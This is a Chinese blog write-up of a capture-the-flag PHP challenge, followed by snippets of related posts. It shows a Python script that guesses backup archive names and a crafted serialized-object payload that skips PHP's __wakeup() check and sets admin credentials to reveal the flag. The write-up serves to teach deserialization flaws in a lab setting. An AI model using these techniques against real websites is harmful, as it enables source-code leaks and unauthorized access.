BUU CTF---[极客大挑战 2019]PHP 1

最新推荐文章于 2024-04-26 20:34:17 发布
最新推荐文章于 2024-04-26 20:34:17 发布
阅读量807 收藏 4
点赞数 1
分类专栏: CTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46685211/article/details/116395600
版权

文章目录

知识点

1、PHP反序列化
2、绕过魔术方法 __wakeup()

一、备份网站

查看界面,提示备份网站。则搜索下载网站的备份文件。写一个程序遍历常见的备份文件网址,发现其中/www,zip的response为200

import requests

url = "url地址"

l1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
l2 = ['tar', 'tar.gz', 'zip', 'rar']
for i in l1:
    for j in l2:
        print(i+" "+j)
        url_final = url + "/" + i + "." + j
        r = requests.get(url_final)
        print(r)

下载后获得一个备份文件。
在这里插入图片描述

二、代码审计

1._wakeup()魔术方法

在反序列化之前调用该方法,一般这个时候变量会被强制改变,所以必须要绕过这个方法对变量的操作。
漏洞原理: 当反序列化字符串中,表示属性个数的值大于其真实值,则跳过。
class.php:

  function __wakeup(){
        $this->username = 'guest';
    }

2.GET方法

审计index.php文件获得变量传输方法(初学初学)。首先include 'class.php’则会先把class.php文件加载入程序中,相当于直接复制进本代码。则后续GET到变量后会通过类创建一个对象。

<?php
    include 'class.php';
    $select = $_GET['select'];//这个地方表示会通过GET的方式获得传入值
    //值传入后通过class的类Name创建对象。
    $res=unserialize(@$select);
    ?>

3.类代码

class Name{
//初始化变量的值
    private $username = 'nonono';
    private $password = 'yesyes';
//构造函数,在每一次new一个新对象前会调用这个方法,一个类里面智能有一个构造方法。在这里面表示new对象时把传入的参数赋值
    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
    //在序列化结束后就进行的操作
    function __wakeup(){
        $this->username = 'guest';
    }
//析构函数,在对象被销毁之前进行的一些操作。在本题中用于判断是否能够返回flag
    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();   
        }
    }
}

分析:这个对象必须要满足username=admin,password=100并且要能跳过_wakeup()才能输出flag。

4.构造对象

(1)O:6:“select”//传入对象的名字是select
(2):2 //传入的对象有两个,在如果要饶过,则需要让这个地方比真实对象多,所以改为3
(3){s:14:“username”;s:5:“admin”;s:14:“password”;i:100;}//本体
但是构造成:O:4:“Name”:3:{s:14:“username”;s:5:“admin”;s:14:“password”;i:100;}并不能获得正确的flag。这个时候助力类里面的对象的属性:
private变量会被序列化为:\x00类名\x00变量名
O:4:“Name”:2:{s:14:"\0Name\0username";s:5:“admin”;s:14:"\0Name\0password";i:100;}
构造输入:O:4:“Name”:3:{s:14:"%00Name%00username";s:5:“admin”;s:14:"%00Name%00password";i:100;}
protected变量会被序列化为:\x00*\x00变量名
O:4:“Name”:2:{s:11:"\0*\0username";s:5:“admin”;s:11:"\0*\0password";i:100;}
构造输入:O:4:“Name”:2:{s:11:"%00*%00username";s:5:“admin”;s:11:"%00*%00password";i:100;}
public变量会被序列化为:变量名
**

这里的 \0 表示 ASCII 码为 0 的字符(不可见字符),而不是 \0
组合。知识用来表示而已,所以在真正构造的时候,使用url编码将这不可见字符构造成%00.

**
最后本题的构造为:select=O:4:“Name”:3:{s:14:"%00Name%00username";s:5:“admin”;s:14:"%00Name%00password";i:100;}
在这里插入图片描述

参考资料

1、include和require的区别
2、PHP中__destruct(),类的析构函数详解
3、php 魔术方法
4、[极客大挑战 2019]PHP

Oooption
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[buuoj]极客挑战 2019]PHP 1
qq_42250840的博客
06-28 1270
知识点: 1、直接扫描目录得到网站源码 2、public、protected与private在序列化时的区别 3、__wakeup()方法绕过 复现: 首先根据提示网站备份文件,考虑扫描备份文件 首先我们需要一个网站备份文件的爆破字典 可以用脚本实现: import sys import imp imp.reload(sys) import os import os.path import requests from urllib.parse import unquote suffixList = ['.
[极客挑战 2019]PHP1
keaixiaohan的博客
07-23 279
进入网址之后如下: 从图片中可以看到关键字“良好备份”,应该网站有备份,/www.zip,http://84ac984d-d4e2-405c-8c84-a828e85691a6.node4.buuoj.cn/www.zip.下载压缩包,打开后有五个文件 首先打开的是flag.php,但是里面的flag是错误的,紧接着打开class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $us.
【web | CTFBUUCTF [极客挑战 2019]PHP 1
weixin_46301214的博客
08-28 291
首先是打印序列化出来的结果是自带类名的,这个一开始以为是个bug,后来发现flag需要这个,导致我也搞不懂为什么了。开始答题,题目说有备份,那就用工具或自己写个脚本去扫(主要看字典),拿CTF的字典一顿扫,发现有源码泄露。你在代码里直接转会自带这种%00,有特殊效果,不知道是截断还是其他效果,反正没有这东西就不通过。当然了,我也是看了答案再反推逻辑的,也不知后台服务器是不是真的这样写。所以就需要把序列化出来的字符串改动一下,从2个元素,改成3个元素。好了,懂开发,踩过坑之后,咱们继续踩坑……
[极客挑战 2019]PHP 1
m0_73734159的博客
11-08 177
一道经典信息收集和反序列化题目
BUUCTF[极客挑战 2019]PHP1题解
cxm4545的博客
04-26 538
想要得到flag,必须满足username===admin,password==100,于是我们就要绕过__wakeup()函数了。(Value是代码运行结果,这里要注意改一下参数个数以绕过__wakeup()函数)(1)进入靶机,我们看到网页提示:备份网站,这时候我们就应该想到有可能源码泄露了。很明显,用get传参,然后反序列化,其实这里就是一个反序列化的题目了。(5)在class.php中,我们观察一下这个Name类。(2)因此,写一个python脚本,扫描一下这个网站。(7)我们写一下代码。
[极客挑战 2019]PHP1-原创超详细
qq_58166735的博客
12-09 3047
php反序列化根据__destruct 析构函数(在这个对象的内容执行完之前 执行函数的内容)的内容可以得知,password=100,username=admin的时候满足条件就可以获得flag。扫出来www.zip这个文件,然后下载下来 ,里面只有index.php和class.php两个文件有作用。(img-WxhXrNIn-1670552259273)]但是发现这个里面有空格,所以把空格url编码变成%00再传参。我用的是top7777.txt字典,扫的很慢。获得flag,实验结束。
BUUCTF-[极客挑战 2019]PHP1
Monica的博客
09-27 3680
目录 题目: 知识点: 分析: 方法: 题目: 知识点: 1. __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过)我们可以通过一个cve来绕过:CVE-2016-7124。将Object中表示数量的字段改成比实际字段大的值即可绕过wakeup函数。条件:PHP5 < 5.6.25,PHP7 < 7.0.10,或者PHP 7.3.4 2. __construct() //当对象被创建即new之前,会触发进行初始化,但在unseri...
apachecn#apachecn-ctf-wiki#[WP/BUUCTF]Cookie-Store-题解_車鈊的博客-CSD
07-25
来源:,涉及Cookie的使用方法操作方
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
BUU刷题-Reveser-FlareOn5_Web2.0(WebAssembly逆向分析)
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
BUU-Reveser-XMAN2018排位赛_easywasm(WebAssembly逆向分析)
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
BUUCTF-[极客挑战 2019]PHP 1
qq_57345310的博客
10-13 595
打开题目,首先是一只猫,真可爱。 首先我们根据题目提示,用dirsearch扫描目录。(按理说御剑也是可以的,但我没有尝试)但要注意,可能会扫不出来备份文件,多扫几次就出来了。如果没有dirsearch,上百度上搜,有很多安装教程和使用教程 最终我们扫到一个备份文件.www.zip 于是我们回到网页,拼接www.zip后就下载到了源码,解压后,可以看见里面有几个文件 但很可惜,flag.php文件里的flag是假的。但这里还是...
[极客挑战 2019]PHP1全网最详细 纯小白也能看懂
qq_51802152的博客
11-30 2053
[极客挑战 2019]PHP1全网最详细 纯小白也能看懂
BUUCTF——[极客挑战2019]PHP1
weixin_62248541的博客
11-25 209
BUUCTF——[极客挑战2019]PHP1
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。 在解密Quoted-printable编码时,我们可以使用在线工具来帮助我们。一个可以使用的工具是[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。 根据提供的信息,得到的flag是"flag{那你也很棒哦}"。 总结:Quoted-printable是一种常见的邮件编码方法,用于将非ASCII字符转换为可打印的ASCII字符。解密Quoted-printable编码可以使用在线工具,如[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。根据提供的信息,得到的flag是"flag{那你也很棒哦}"。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值